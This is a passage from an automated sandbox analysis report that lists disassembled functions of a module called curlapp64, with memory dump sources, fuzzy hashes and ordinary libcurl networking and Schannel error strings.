                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast$connect
                                                                                                                                                                                                  • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                                                                                                                                                  • API String ID: 375857812-3816509080
                                                                                                                                                                                                  • Opcode ID: 4cef62afdbd1f62068aa72caeca13159fb1d657b4ee3ef16e4f21e7c524d33a7
                                                                                                                                                                                                  • Instruction ID: ad98237fd12efa534db12ea906ae8ed88a0b512a1c47cd647fedc82a8c5ec08f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4cef62afdbd1f62068aa72caeca13159fb1d657b4ee3ef16e4f21e7c524d33a7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26617E62A0878685EB609B29D9107FD27A1AF46FE8F044231DF2D0B7E6DF6CE485C351
                                                                                                                                                                                                  Function 00007FF8B7E62940 Relevance: 12.1, APIs: 8, Instructions: 67networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CriticalErrorLastSection$Leavefreememmove$Enterfreeaddrinfogetaddrinfomallocsend
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3198214216-0
                                                                                                                                                                                                  • Opcode ID: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                                                                                  • Instruction ID: b256df9e4642781a35d1f10345723e761f6e8d6434036e19db3d7994254ef622
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e069468138294b0d42a7d9e2d196727a2492f3a9547db1b3114be7453674423a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B313732A08B4286E7508F79E44426E27A4EF84FE8F444232DB5D966B8DF7CE589C740
                                                                                                                                                                                                  Function 00007FF8B7EBF250 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 175COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: freemallocmemmove
                                                                                                                                                                                                  • String ID: schannel: timed out sending data (bytes sent: %zd)$select/poll on SSL socket, errno: %d
                                                                                                                                                                                                  • API String ID: 2537350866-3891197721
                                                                                                                                                                                                  • Opcode ID: ea8ccbb4f287b466a3a645598825cd33ff855f91ed014b2eb6e34d696ae293f7
                                                                                                                                                                                                  • Instruction ID: e8342bab882a8ed9a9e1f433b6d891c9fb43fd94ebf0e354097e29d7f34ed783
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea8ccbb4f287b466a3a645598825cd33ff855f91ed014b2eb6e34d696ae293f7
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03717E72B08B018AEB50DBA9D4446AD37A5AF48BE8F404235DF2D6BBE5DF3CA515C340
                                                                                                                                                                                                  Function 00007FF8B7E716F0 Relevance: 10.6, APIs: 7, Instructions: 123networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: memmove$ErrorLastfreefreeaddrinfogetaddrinfomalloc
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 420754818-0
                                                                                                                                                                                                  • Opcode ID: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                                                                                                                                                  • Instruction ID: 116289b957a0af5d9a53d57b8619025b39d554da1f15ce92af0030bbc2b848d9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5690689acaa421e89e377b4d98ad99c46781c34d9c6ee45bdbc63379844944fc
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69416032A0974586EB658F1AA54062D7BA5FF88FE0F044135EF9D17BA4DF3CE4418701
                                                                                                                                                                                                  Function 00007FF8B7E66290 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 120networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorIoctlLastsendsetsockopt
                                                                                                                                                                                                  • String ID: Send failure: %s$send(len=%zu) -> %d, err=%d
                                                                                                                                                                                                  • API String ID: 2224487826-343019339
                                                                                                                                                                                                  • Opcode ID: 0fdf7ad55e293d987571af5160d8486bd2c328b03123efad72481fa92db8264f
                                                                                                                                                                                                  • Instruction ID: 08fa550f3ed1f12a05acbd2d7d537342834d7fcc645024ad92cd7a608f19714b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0fdf7ad55e293d987571af5160d8486bd2c328b03123efad72481fa92db8264f
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5516E72A08B8586EB608F29E4817AD77A0FB99B94F404131DF8D47765DF7CE185CB00
                                                                                                                                                                                                  Function 00007FF8B7E67F90 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 76networkCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: _errno$ErrorLast$getsockname
                                                                                                                                                                                                  • String ID: getsockname() failed with errno %d: %s$ssloc inet_ntop() failed with errno %d: %s
                                                                                                                                                                                                  • API String ID: 837846698-2605427207
                                                                                                                                                                                                  • Opcode ID: 979241306aa7c7a411256f69e4a13ecbbc28351d44a85b130b8ae4283e24c192
                                                                                                                                                                                                  • Instruction ID: fe425e1f542414d3a2b36624601cf50f17401c41368ae0e73d80ffc1121ba4d4
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 979241306aa7c7a411256f69e4a13ecbbc28351d44a85b130b8ae4283e24c192
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6314122A1C7C282E660DB19E4143EE6360FF99BC8F405336EA9C476A5DF6CE585C700
                                                                                                                                                                                                  Function 00007FF8B7EAE640 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_INCOMPLETE_CREDENTIALS
                                                                                                                                                                                                  • API String ID: 3939687465-1320471878
                                                                                                                                                                                                  • Opcode ID: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                                                                                                                                                  • Instruction ID: c189e59945903c15b4da863971b02347280caaec63d69e71186735a6b0dc5a23
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03152994c3950484c5c98b6f09b6cf5e3df2be0ebc9ea3828cb78d72b3857db1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C6015226A1CB42C5FA619F19B4411BD23A5BF88FD5F841031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE634 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_ENCRYPT_FAILURE
                                                                                                                                                                                                  • API String ID: 3939687465-3371550302
                                                                                                                                                                                                  • Opcode ID: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                                                                                                                                                  • Instruction ID: 276d1399dd2b67116c15be39aee01a7b500acd671a5333b4a18ea4bb082f558a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c95089c4754a777f2387e5c161045ba63b7e950e5af8988961487714c573afcb
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E015226A1CB42C5FA619F29B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE628 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_DOWNGRADE_DETECTED
                                                                                                                                                                                                  • API String ID: 3939687465-1814928707
                                                                                                                                                                                                  • Opcode ID: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                                                                                                                                                  • Instruction ID: 80b5a001f9046a8babe86232f28d9cecbb7be94e9937e8203a43436d58e74036
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e40e7ce7aaa022eaac0eb0474ca994afa18f010793b8621ccf14ea6f630dde15
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8C014026A18B4285EA619F19A4411BD63A5BF88FD5F840032DB4E067A0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE61C Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_REQUIRED
                                                                                                                                                                                                  • API String ID: 3939687465-3988574617
                                                                                                                                                                                                  • Opcode ID: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                                                                                                                                                  • Instruction ID: bc4d530399b8d1a835c0fb6d5b17d99b606eaffbd3e6b66a9f1ac6df0facd0f3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3a3bde5c9ab0fb7f7e326860c92128801c8b0d75ec7503537036e7543c7320be
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D9014026A18B4285EA619F59A4411BD23A5BF88FD5F840031DB4E067A0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE610 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_DELEGATION_POLICY
                                                                                                                                                                                                  • API String ID: 3939687465-829877842
                                                                                                                                                                                                  • Opcode ID: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                                                                                                                                                  • Instruction ID: 489d2901bb8d3bb9a3ee9f1d90dfa2cb08bb20dc1dea880eb4b8d854424ea932
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d4d8b91f72fff87b202198528f23fdc910b22ffa6555036cbe69808ad8010e3e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 32015226A1CB42C5FA659F19B4412BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE604 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_DECRYPT_FAILURE
                                                                                                                                                                                                  • API String ID: 3939687465-1043736155
                                                                                                                                                                                                  • Opcode ID: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                                                                                                                                                  • Instruction ID: 68fecf91f0e9cacfc1d002cbf35455faaf781b04e717ed37c3bbcd0ab79bd6fe
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c35cf236970ab930637a02230fddc1cfffb66284058033d907bb0a4ca484230
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26015226A1CB42C5FA619F19B4411BD23A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5F8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CRYPTO_SYSTEM_INVALID
                                                                                                                                                                                                  • API String ID: 3939687465-3331766186
                                                                                                                                                                                                  • Opcode ID: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                                                                                                                                                  • Instruction ID: eb1b310c688a44736887cd27a070a9fe47a0b26f57faaab92b8145e961976aa8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1bae386a3d65ff28abd1242a99fe727f19cf3943ac4257ccb029480fa423dac
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7015226A1CB42C5FA619F19B4411BD63A5BF88FD5F840031DB4E067B0EF3CE589C610
                                                                                                                                                                                                  Function 00007FF8B7EAE5EC Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000005.00000002.2165626004.00007FF8B7E61000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8B7E60000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165610881.00007FF8B7E60000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165667540.00007FF8B7ECB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165689443.00007FF8B7EE7000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165706552.00007FF8B7EE8000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165723910.00007FF8B7EE9000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000005.00000002.2165748085.00007FF8B7EEB000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_7ff8b7e60000_curlapp64.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ErrorLast_errno
                                                                                                                                                                                                  • String ID: %s (0x%08X) - %s$SEC_E_CROSSREALM_DELEGATION_FAILURE
                                                                                                                                                                                                  • API String ID: 3939687465-3852342135
